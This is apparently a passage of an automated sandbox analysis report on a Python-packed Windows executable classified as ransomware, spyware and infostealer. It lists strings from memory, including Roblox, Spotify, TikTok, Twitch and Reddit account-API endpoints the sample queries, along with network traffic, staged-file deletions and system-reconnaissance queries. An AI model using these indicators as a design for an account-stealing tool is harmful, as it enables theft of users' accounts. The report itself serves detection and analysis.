                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1122)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                      Source: RuntimeusererVers.exe, 00000003.00000003.1420918494.0000022335173000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_so
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RuntimeusererVers.exe, 00000003.00000003.1420918494.0000022335173000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7E2000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6E8A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_VERIFY_PARAM_set_flags.html
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_verify_cert_error_string.html#ERROR-CODES
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man5/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pyopenssl.org
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedD
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhtt
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profileatextaloadsaprofileagenderabirthdateD
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/adisplayNameahasPrimeaisPartneralanguageaprofileImageURLabitsBalanceatotalCoun
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233425C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
                      Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
                      Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EIVQSAOTAQ.png
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SQSJKEBWDT.png
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.docx
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.pdf
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\KLIZUSIQEN.mp3
                      Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: _overlapped.pyd.37.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: unicodedata.pyd.37.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: _overlapped.pyd.55.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: python3.dll.0.dr Static PE information: No import functions for PE file found
                      Source: python3.dll.37.dr Static PE information: No import functions for PE file found
                      Source: python3.dll.55.dr Static PE information: No import functions for PE file found
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6E8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exeBinary or memory string: OriginalFilename vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exeBinary or memory string: OriginalFilename vs RuntimeusererVers.exe
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: Commandline size = 3647
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: Commandline size = 3647
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@113/224@5/7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeMutant created: \Sessions\1\BaseNamedObjects\X
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942
                      Source: RuntimeusererVers.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
